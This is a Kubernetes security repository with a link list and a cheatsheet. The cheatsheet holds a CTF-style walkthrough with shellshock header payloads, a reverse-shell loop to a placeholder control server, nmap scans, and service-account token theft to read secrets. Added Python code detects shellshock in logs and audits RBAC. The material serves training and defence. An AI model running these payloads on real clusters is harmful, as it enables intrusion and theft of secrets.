├── LICENSE
├── README.md
├── art
│   ├── HackingKubernetes.png
│   ├── HackingKubernetes0.jpg
│   ├── kubernetes_arquitecture.png
│   └── ports_kubernetes.png
└── pdf
    ├── Learn by Hacking.zip
    └── k8s_cheatsheet.md

/LICENSE:
--------------------------------------------------------------------------------
MIT License

Copyright (c) 2024 Andrej Marinchenko

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------


# HackingKubernetes
HackingKubernetes is a curated collection of resources on securing and attacking Kubernetes. Kubernetes is a leading container management system in development pipelines across the world, but it is not exempt from malicious attacks. Using Kubernetes requires a deep understanding of the Kubernetes environment, including the different vulnerabilities you can be exposed to while creating, deploying, or running applications in your clusters.

Since your Kubernetes cluster is likely one of your most valuable cloud resources, it needs to be protected. Kubernetes security addresses the safety of your cloud, application clusters, containers, apps and code. Although Kubernetes provides inherent security advantages, bolstering your defensive tactics is crucial to protecting your system against hackers and other cybersecurity threats.

## Intro
- [OWASP Kubernetes Top Ten](https://owasp.org/www-project-kubernetes-top-ten/)
- [Kubernetes adoption, security, and market trends report](https://www.redhat.com/en/resources/kubernetes-adoption-security-market-trends-overview)

### Official Kubernetes documentation
- [Kubernetes Documentation](https://kubernetes.io/docs/home/)
- [Github repo kubernetes](https://github.com/kubernetes/kubernetes/)
- [11 Ways (Not) to Get Hacked](https://kubernetes.io/blog/2018/07/18/11-ways-not-to-get-hacked/)
- [Security kubernetes](https://kubernetes.io/docs/concepts/security/)
- [Docker Engine security](https://docs.docker.com/engine/security/)

### Security resources
- [Container Security Site](https://www.container-security.site/)
- [KubeCon + CloudNativeCon Europe 2024](https://www.youtube.com/playlist?list=PLj6h78yzYM2N8nw1YcqqKveySH6_0VnI0)
- [Cloud native computing foundation](https://www.cncf.io/)

### Intro from TryHackMe (free)
- [Intro to IaC](https://tryhackme.com/r/room/introtoiac)
- [Intro to IaC with answers](https://github.com/BEPb/tryhackme/blob/master/01.easy/Intro%20to%20IaC.md)
- [Microservices Architectures](https://tryhackme.com/r/room/microservicearchitectures)
- [Microservices Architectures with answers](https://github.com/BEPb/tryhackme/blob/master/01.easy/Microservices%20Architectures.md)
- [Kubernetes for Everyone](https://tryhackme.com/r/room/kubernetesforyouly)
- [Kubernetes for Everyone with answers](https://github.com/BEPb/tryhackme/blob/master/02.Medium/Kubernetes%20for%20Everyone.md)
- [K8s Best Security Practices](https://tryhackme.com/r/room/k8sbestsecuritypractices)
- [K8s Best Security Practices with answers](https://github.com/BEPb/tryhackme/blob/master/02.Medium/K8s%20Best%20Security%20Practices.md)
- [Cluster Hardening](https://tryhackme.com/r/room/clusterhardening)
- [Cluster Hardening with answers](https://github.com/BEPb/tryhackme/blob/master/02.Medium/Cluster%20Hardening.md)
- [Frank & Herby make an app](https://tryhackme.com/r/room/frankandherby)
- [Frank & Herby make an app with answers](https://github.com/BEPb/tryhackme/blob/master/02.Medium/Frank%20%26%20Herby%20make%20an%20app.md)

### Intro from VMware
- [What is Kubernetes?](https://www.vmware.com/topics/kubernetes)
- [What is DevSecOps?](https://tanzu.vmware.com/devsecops)
- [What is Kubernetes Architecture?](https://www.vmware.com/topics/kubernetes-architecture)
- [What are Kubernetes Services?](https://www.vmware.com/topics/kubernetes-services)
- [What is Kubernetes Security?](https://www.vmware.com/topics/kubernetes-security)
- [What is Kubernetes Networking?](https://www.vmware.com/topics/kubernetes-networking)
- [What are Kubernetes Clusters vs. Nodes vs. Pods vs. Containers vs. Containerized Applications?](https://www.vmware.com/topics/components-kubernetes)
- [What are Kubernetes Pods?](https://www.vmware.com/topics/kubernetes-pods)

### Intro from yarsalabs
- [A Deep Dive Into Kubernetes Pods](https://blog.yarsalabs.com/a-deep-dive-into-kubernetes-pods/)
- [Installing the Components required for a Kubernetes Cluster](https://blog.yarsalabs.com/kubernetes-cluster-from-scratch-part1/)
- [TLS Certificates Management for a Kubernetes Cluster](https://blog.yarsalabs.com/kubernetes-cluster-from-scratch-part2/)
- [ETCD Server Setup for a Kubernetes Cluster](https://blog.yarsalabs.com/kubernetes-cluster-from-scratch-part3/)
- [Generating Kubernetes Configuration Files for Authentication](https://blog.yarsalabs.com/kubernetes-cluster-from-scratch-part4/)
- [Creating the Kubernetes Control Plane](https://blog.yarsalabs.com/kubernetes-cluster-from-scratch-part5/)

### Cheatsheets
- [quick reference](https://kubernetes.io/docs/reference/kubectl/quick-reference/)
- [k8s_cheatsheet.md](https://github.com/BEPb/HackingKubernetes/blob/master/pdf/k8s_cheatsheet.md)
- [k8s-cheat-sheet](https://encore.dev/resources/k8s-cheat-sheet)
- [kubernetes-cheat-sheet](https://www.mirantis.com/blog/kubernetes-cheat-sheet)
- [Kubernetes Security Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Kubernetes_Security_Cheat_Sheet.html#securing-data)

![arquitecture](art/kubernetes_arquitecture.png)
![ports](art/ports_kubernetes.png)

### Articles: How to Hack Kubernetes
- [How to Hack Kubernetes (and How to Protect It)](https://goteleport.com/blog/how-to-hack-kubernetes/)
- [Securing Kubernetes Clusters by Eliminating Risky Permissions](https://www.cyberark.com/resources/threat-research-blog/securing-kubernetes-clusters-by-eliminating-risky-permissions)
- [Kubernetes Pentest Methodology Part 1](https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-1)
- [Kubernetes Pentest Methodology Part 2](https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-2)
- [Kubernetes Pentest Methodology Part 3](https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-3)
- [Eight Ways to Create a Pod](https://www.cyberark.com/resources/threat-research-blog/eight-ways-to-create-a-pod)
- [Kubernetes Pod Escape Using Log Mounts](https://www.aquasec.com/blog/kubernetes-security-pod-escape-log-mounts/)
- [The Route to Root: Container Escape Using Kernel Exploitation](https://www.cyberark.com/resources/threat-research-blog/the-route-to-root-container-escape-using-kernel-exploitation)
- [Attacking Kubernetes clusters using the Kubelet API](https://faun.pub/attacking-kubernetes-clusters-using-the-kubelet-api-abafc36126ca)
- [Threat matrix for Kubernetes](https://www.microsoft.com/en-us/security/blog/2020/04/02/attack-matrix-kubernetes/)
- [Secure containerized environments with updated threat matrix for Kubernetes](https://www.microsoft.com/en-us/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/)
- [Introduction to GKE Kubelet TLS Bootstrap Privilege Escalation](https://rhinosecuritylabs.com/cloud-security/kubelet-tls-bootstrap-privilege-escalation/)
- [Bad Pods: Kubernetes Pod Privilege Escalation](https://bishopfox.com/blog/kubernetes-pod-privilege-escalation)
- [Bad Pods github](https://github.com/BishopFox/badPods)
- [Hacking Kubelet on Google Kubernetes Engine](https://www.4armed.com/blog/hacking-kubelet-on-gke/)

### PDF
- [Learn by Hacking](https://github.com/calinah/learn-by-hacking-kccn/blob/master/Learn%20by%20Hacking.pdf)

### Kubernetes Security
- [Kubernetes Security Best Practices everyone must follow](https://www.cncf.io/blog/2019/01/14/9-kubernetes-security-best-practices-everyone-must-follow)
- [Securing a Cluster](https://kubernetes.io/docs/tasks/administer-cluster/securing-a-cluster)
- [Security Best Practices for Kubernetes Deployment](https://kubernetes.io/blog/2016/08/security-best-practices-kubernetes-deployment)
- [Kubernetes Security Best Practices](https://phoenixnap.com/kb/kubernetes-security-best-practices)
- [Kubernetes Security 101: Risks and 29 Best Practices](https://www.stackrox.com/post/2020/05/kubernetes-security-101)
- [15 Kubernetes security best practices to secure your cluster](https://www.mobilise.cloud/15-kubernetes-security-best-practice-to-secure-your-cluster)
- [The Ultimate Guide to Kubernetes Security](https://neuvector.com/container-security/kubernetes-security-guide)
- [11 Ways (Not) to Get Hacked](https://kubernetes.io/blog/2018/07/18/11-ways-not-to-get-hacked)
- [12 Kubernetes configuration best practices](https://www.stackrox.com/post/2019/09/12-kubernetes-configuration-best-practices/#6-securely-configure-the-kubernetes-api-server)
- [A Practical Guide to Kubernetes Logging](https://logz.io/blog/a-practical-guide-to-kubernetes-logging)
- [Kubernetes Web UI (Dashboard)](https://kubernetes.io/docs/tasks/access-application-cluster/web-ui-dashboard)
- [OPEN POLICY AGENT: CLOUD-NATIVE AUTHORIZATION](https://blog.styra.com/blog/open-policy-agent-authorization-for-the-cloud)
- [Introducing Policy As Code: The Open Policy Agent (OPA)](https://www.magalix.com/blog/introducing-policy-as-code-the-open-policy-agent-opa)
- [What service mesh provides](https://aspenmesh.io/wp-content/uploads/2019/10/AspenMesh_CompleteGuide.pdf)
- [Three Technical Benefits of Service Meshes and their Operational Limitations, Part 1](https://glasnostic.com/blog/service-mesh-istio-limits-and-benefits-part-1)
- [Open Policy Agent: What Is OPA and How It Works (Examples)](https://spacelift.io/blog/what-is-open-policy-agent-and-how-it-works)
- [Send Kubernetes Metrics To Kibana and Elasticsearch](https://logit.io/sources/configure/kubernetes/)
- [Kubernetes Security Checklist](https://kubernetes.io/docs/concepts/security/security-checklist/)

## Container & Kubernetes Security Tools

This is a list of open source tools which help with areas related to Container security. Some of the tools in this list don't fit neatly into a specific category or categories, so they're listed with the closest option.

### Container Attack Surface Assessment & Breakout Tools

Useful tools to run inside a container to assess the sandbox that's in use, and exploit some common breakout issues.

### Container Vulnerability Scanning Tools

### IaC Scanning Tools that cover container formats

### Docker Security Tools

### Container Runtime Security Tools

### Container Registry Tools

### Container Image Tools

### Kubernetes Tools

### RBAC Assessment Tools

### Kubernetes Security Auditing Tools

### Kubernetes Penetration Testing Tools

### Kubelet Tools

### etcd Tools

### Security Observability Tools

### Training Tools

If you're looking to practice with some of the tools here, in a safe environment, there are projects to help with that.

### Kubernetes Honeypot projects

### Kubernetes Security Improvement Tools

### Deprecated/Unmaintained Tools

Inevitably over time, some tools will become unmaintained and deprecated. Whilst they may still work ok, caution is needed. If I've listed you here and you're not deprecated just open an issue to move it back :)

--------------------------------------------------------------------------------
/art/HackingKubernetes.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BEPb/HackingKubernetes/096d66b03a5d972ff3501b413c8900bccfe38f05/art/HackingKubernetes.png
--------------------------------------------------------------------------------
/art/HackingKubernetes0.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BEPb/HackingKubernetes/096d66b03a5d972ff3501b413c8900bccfe38f05/art/HackingKubernetes0.jpg
--------------------------------------------------------------------------------
/art/kubernetes_arquitecture.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BEPb/HackingKubernetes/096d66b03a5d972ff3501b413c8900bccfe38f05/art/kubernetes_arquitecture.png
--------------------------------------------------------------------------------
/art/ports_kubernetes.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BEPb/HackingKubernetes/096d66b03a5d972ff3501b413c8900bccfe38f05/art/ports_kubernetes.png
--------------------------------------------------------------------------------
/pdf/Learn by Hacking.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BEPb/HackingKubernetes/096d66b03a5d972ff3501b413c8900bccfe38f05/pdf/Learn by Hacking.zip
--------------------------------------------------------------------------------
/pdf/k8s_cheatsheet.md:
--------------------------------------------------------------------------------
This guide has been created to help engineers debug applications that are deployed into Kubernetes and not behaving correctly.
## Pod & Container Introspection

| Command | Description |
| --- | --- |
| `kubectl get pods` | lists the current pods in the current namespace |
| `kubectl get pods -w` | watches pods continuously |
| `kubectl describe pod <pod>` | describe pod |
| `kubectl get rc` | list the replication controllers |
| `kubectl get services` or `kubectl get svc` | list the services in the current namespace |
| `kubectl describe service <service>` or `kubectl describe svc <service>` | describe service |
| `kubectl delete pod <pod>` | delete pod |
| `kubectl get pods -o wide -w` | watch pods continuously and show info such as IP addresses and the nodes they are provisioned on |

## Cluster Introspection

| Command | Description |
| :--- | :--- |
| `kubectl version` | get version info |
| `kubectl cluster-info` | get cluster info |
| `kubectl config view` | get cluster config |
| `kubectl describe node <node>` | output info about a node |
| `kubectl get nodes -w` | watch nodes continuously |
| `kubectl get nodes -o wide` | gives a detailed view of nodes, including internal and external IP addresses |

## Debugging

| Command | Description |
| --- | --- |
| `kubectl exec -ti <pod> [-c <container>] -- <command>` | execute a command on a pod, optionally in a given container |
| `klog <pod> [-c <container>]` or `kubectl logs -f <pod> [-c <container>]` | get logs of a given pod or, optionally, container |

## Networking

| Command | Description |
| --- | --- |
| `kubectl exec -ti <pod> -- /bin/sh -c "curl -v telnet://<host>:<port>"` | testing TCP connectivity between services |

## Other resources

- check whether an action is allowed in your Kubernetes cluster (`kubectl auth can-i`)

Use `amicontained` to find out what container runtime you're using as well as what capabilities your container has.

```
# Export the sha256sum for verification.
$ export AMICONTAINED_SHA256="4e32545f68f25bcbcd4cce82743e916a054e1686df44fab68420fc9f94f80b21"

# Download and check the sha256sum.
$ curl -fSL "https://github.com/genuinetools/amicontained/releases/download/v0.4.7/amicontained-linux-amd64" -o "/usr/local/bin/amicontained" \
    && echo "${AMICONTAINED_SHA256} /usr/local/bin/amicontained" | sha256sum -c - \
    && chmod a+x "/usr/local/bin/amicontained"

$ echo "amicontained installed!"

# Run it!
$ amicontained -h
```

Add these functions to your environment so that you can scan for open ports

```
sudo apt-get update
sudo apt-get install nmap

# Scan the ports commonly used by Kubernetes components on the given hosts.
nmap-kube () {
    nmap --open -T4 -A -v -Pn -p 443,2379,4194,6782-6784,6443,8443,8080,9099,10250,10255,10256 "${@}"
}

# Derive the local /24 from eth0 and scan it together with a few common cluster ranges.
nmap-kube-discover () {
    local LOCAL_RANGE=$(ip a | awk '/eth0$/{print $2}' | sed 's,[0-9][0-9]*/.*,*,');
    local SERVER_RANGES=" ";
    SERVER_RANGES+="10.0.0.1 ";
    SERVER_RANGES+="10.0.1.* ";
    SERVER_RANGES+="10.*.0-1.* ";
    nmap-kube ${SERVER_RANGES} "${LOCAL_RANGE}"
}
nmap-kube-discover
```

Part 1: compromise via shellshock

Useful commands for finding open ports:

```
command nmap -Pn -T4 -F --open <target>
# scanning every port, more is open
command nmap -Pn -T4 --open -p 0-65535 <target>
command nmap -Pn -T4 --open -p 30081 <target>
```

1. Check shellshock

```
curl http://<host>:30081/cgi-bin/stats -H 'user-agent: () { :; }; echo; echo; 2>&1 /bin/bash -c "cat /etc/passwd"'
```

2. create a control server to use as a reverse shell endpoint

this requires any node with a public IP (a digital ocean server would do)

```
# replace `controlplane` with a host that you can SSH to
ssh controlplane ip a

# replace 1234 with a port that is routable on the host you have SSH'd into
while :; do ssh controlplane ncat --listen 1234 --output $(mktemp /tmp/hack-XXXX.log); done
```

3. shellshock in

```
curl http://<host>:30081/cgi-bin/stats -H 'user-agent: () { :; }; echo; echo; 2>&1 /bin/bash -c "echo hello"'
```

Hardcore version:

```
while :; do curl http://<host>:30081/cgi-bin/stats -H 'user-agent: () { :; }; echo; echo; 2>&1 /bin/bash -c "test -f /tmp/k || wget -O /tmp/k https://storage.googleapis.com/kubernetes-release/release/v1.11.2/bin/linux/amd64/kubectl && chmod +x /tmp/k && /tmp/k version; df -h; while :; do nohup bash -i >& /dev/tcp/<control-server>/1234 0>&1; sleep 1; done"'; done
```

Part 2:

Kubectl SA: steal secret with ssh password in (flag)

### Steps

1. on the control server, or via individual shellshock commands:

Search for secrets:

```
df -h
cat /run/secrets/kubernetes.io/serviceaccount/token; echo

/tmp/k --token "$(cat /run/secrets/kubernetes.io/serviceaccount/token)" --server https://kubernetes.default.svc --insecure-skip-tls-verify get nodes

/tmp/k --token "$(cat /run/secrets/kubernetes.io/serviceaccount/token)" --server https://kubernetes.default.svc --insecure-skip-tls-verify auth can-i get secrets --namespace kube-system
```

2. pull secrets from the API server for this namespace (there's a service account mounted that can read kube-system)

```
/tmp/k --token "$(cat /run/secrets/kubernetes.io/serviceaccount/token)" --server https://kubernetes.default.svc --insecure-skip-tls-verify get secrets -n shellshock
```

3. we've found secrets, now decode them

> first way requires manual base64 decode, second is a one-liner

```
/tmp/k --token "$(cat /run/secrets/kubernetes.io/serviceaccount/token)" --request-timeout 5s --server https://kubernetes.default.svc --insecure-skip-tls-verify get secret my-secret -o yaml -n shellshock

/tmp/k --token "$(cat /run/secrets/kubernetes.io/serviceaccount/token)" --server https://kubernetes.default.svc --insecure-skip-tls-verify get secret my-secret -n shellshock -o 'go-template={{index .data "ssh_password"}}' | base64 -d; echo
```

4. find password for ssh server in flag

5. write password in local file to win (or just tell ControlPlane!) TODO(low): write test for this

```
echo 'What kind of plane is it?' > /tmp/flag
```
--------------------------------------------------------------------------------
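The Part 1 probes above all arrive as a `() { :; };` function definition in a request header that the CGI handler exports into the environment, so the web server's access log is the place to spot them. The following detector is an added example (not from the cheatsheet or the original repo): it assumes Apache/nginx combined log format, runs over constructed sample lines, and rates a hit higher when the payload also carries download or reverse-shell strings like those in the "hardcore" variant. Patching bash and not exporting untrusted headers is the fix; this only finds the attempts.

```python
import re

# Combined log format; the user-agent field may contain \" escapes, which the
# regex tolerates so a quoted payload still parses as one field.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>(?:[^"\\]|\\.)*)"$'
)

# Bash function definition followed by ';' and a trailing command: the
# shellshock trigger, independent of which header carried it.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;")

# Strings that turn a probe into a download-and-callback payload.
HIGH_RISK = ("/dev/tcp/", "bash -i", "nohup", "wget ", "curl ", "/tmp/k")

# Constructed sample log (no real hosts); two of the four lines are probes.
SAMPLE_LOG = """\
10.0.1.5 - - [10/Jun/2024:12:00:01 +0000] "GET /cgi-bin/stats HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.0.1.9 - - [10/Jun/2024:12:00:07 +0000] "GET /cgi-bin/stats HTTP/1.1" 200 1432 "-" "() { :; }; echo; echo; 2>&1 /bin/bash -c \\"cat /etc/passwd\\""
10.0.1.9 - - [10/Jun/2024:12:00:15 +0000] "GET /cgi-bin/stats HTTP/1.1" 200 88 "-" "() { :; }; echo; echo; 2>&1 /bin/bash -c \\"nohup bash -i >& /dev/tcp/203.0.113.7/1234 0>&1\\""
10.0.1.5 - - [10/Jun/2024:12:00:20 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "curl/8.5.0"
"""


def scan_log(text):
    """Return one finding per request whose user-agent carries a shellshock probe."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m or not SHELLSHOCK_RE.search(m.group("ua")):
            continue
        payload = m.group("ua").replace('\\"', '"')
        parts = m.group("req").split()
        findings.append({
            "src": m.group("ip"),
            "time": m.group("ts"),
            "path": parts[1] if len(parts) > 1 else m.group("req"),
            "status": int(m.group("status")),
            "severity": "high" if any(k in payload for k in HIGH_RISK) else "medium",
            "payload": payload,
        })
    return findings


def sources(findings):
    """Count probes per source address, to feed a block list or an alert."""
    counts = {}
    for f in findings:
        counts[f["src"]] = counts.get(f["src"], 0) + 1
    return counts


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['severity']:6} {f['src']:10} {f['path']:16} {f['payload'][:60]}")
    print(sources(scan_log(SAMPLE_LOG)))
```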
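Part 2 works because the token mounted into the compromised pod belongs to a service account that RBAC allows to read secrets in another namespace. The `auth can-i` check above asks the API server one question at a time; the added example below (not from the cheatsheet or the original repo) evaluates the same question offline against constructed Role, ClusterRole and RoleBinding objects, including the rule that a RoleBinding referencing a ClusterRole still only grants within the binding's namespace, so an auditor can list every service account that can read secrets before an attacker does.

```python
# Constructed RBAC objects (not from a real cluster). Key: (kind, namespace, name).
ROLES = {
    ("ClusterRole", None, "secret-reader"): [
        {"apiGroups": [""], "resources": ["secrets"], "verbs": ["get", "list"]}],
    ("Role", "shellshock", "pod-viewer"): [
        {"apiGroups": [""], "resources": ["pods"], "verbs": ["get", "list", "watch"]}],
}

BINDINGS = [
    # Lives in kube-system but names the default SA of the shellshock namespace:
    # exactly the cross-namespace grant the walkthrough abuses.
    {"kind": "RoleBinding", "namespace": "kube-system",
     "roleRef": {"kind": "ClusterRole", "name": "secret-reader"},
     "subjects": [{"kind": "ServiceAccount", "name": "default", "namespace": "shellshock"}]},
    # Granted to every service account in the namespace via its implicit group.
    {"kind": "RoleBinding", "namespace": "shellshock",
     "roleRef": {"kind": "Role", "name": "pod-viewer"},
     "subjects": [{"kind": "Group", "name": "system:serviceaccounts:shellshock"}]},
]


def _rule_allows(rule, verb, resource, api_group):
    """Match one PolicyRule; '*' is a wildcard in each of the three lists."""
    def hit(key, value):
        items = rule.get(key, [])
        return "*" in items or value in items
    return hit("apiGroups", api_group) and hit("resources", resource) and hit("verbs", verb)


def _subject_matches(subject, sa_ns, sa_name):
    """A service account matches directly or through the groups it is always in."""
    if subject.get("kind") == "ServiceAccount":
        return subject.get("name") == sa_name and subject.get("namespace") == sa_ns
    if subject.get("kind") == "Group":
        return subject.get("name") in ("system:authenticated", "system:serviceaccounts",
                                       f"system:serviceaccounts:{sa_ns}")
    return False


def can_i(sa_ns, sa_name, verb, resource, namespace, api_group=""):
    """True if system:serviceaccount:<sa_ns>:<sa_name> may perform verb on resource in namespace."""
    for binding in BINDINGS:
        if not any(_subject_matches(s, sa_ns, sa_name) for s in binding.get("subjects", [])):
            continue
        ref = binding["roleRef"]
        if binding["kind"] == "RoleBinding":
            # A RoleBinding never grants outside its own namespace, even when
            # the role it references is a ClusterRole.
            if binding["namespace"] != namespace:
                continue
            role_ns = binding["namespace"] if ref["kind"] == "Role" else None
            role_key = (ref["kind"], role_ns, ref["name"])
        else:  # ClusterRoleBinding: applies in every namespace
            role_key = ("ClusterRole", None, ref["name"])
        if any(_rule_allows(r, verb, resource, api_group) for r in ROLES.get(role_key, [])):
            return True
    return False


def secret_readers(namespace, service_accounts):
    """Subset of (ns, name) service accounts that can read secrets in namespace."""
    return [sa for sa in service_accounts if can_i(sa[0], sa[1], "get", "secrets", namespace)]


if __name__ == "__main__":
    for ns in ("kube-system", "shellshock"):
        print(ns, "get secrets:", can_i("shellshock", "default", "get", "secrets", ns))
```

Against a live cluster, the same subject/binding/rule data comes from `kubectl get rolebindings,clusterrolebindings,roles,clusterroles -A -o json`, and a pod that needs no API access should set `automountServiceAccountToken: false` so there is no token to steal.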